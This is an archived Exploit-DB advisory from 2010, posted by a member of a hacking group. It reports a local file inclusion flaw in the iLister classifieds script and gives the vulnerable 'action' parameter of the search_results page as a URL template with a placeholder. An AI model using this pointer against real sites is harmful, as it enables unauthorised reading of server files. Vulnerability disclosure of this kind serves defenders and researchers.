iLister Listing Software LFI Vulnerability

2010-07-04T00:00:00
ID EDB-ID:14202
Type exploitdb
Reporter Sid3^effects
Modified 2010-07-04T00:00:00

Description

iLister Listing Software LFI Vulnerability. Webapps exploit for php platform

                                        
                                            1               ##########################################             1
0               I'm Sid3^effects member from Inj3ct0r Team             1
1               ##########################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Name :    iLister listing script LFi Vulnerability
Date : july 4,2010
Critical Level 	: HIGH
vendor URL :http://www.worksforweb.com/
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz 
#######################################################################################################
Description:
iLister listing script is an extremely powerful and flexible multi-language classifieds software. iLister listing script is your best choice in creating a SEO-friendly classifieds ads website for your visitors to sell anything, from cars to houses, to watches, to pets, to software scripts, or to works of art. If you need a powerful business directory script, iLister is the best choice to build a popular business directory. 
#######################################################################################################
Xploit : LFi Vulnerability

http://server/search_results/?action=[LFI]

###############################################################################################################
# 0day no more 
# Sid3^effects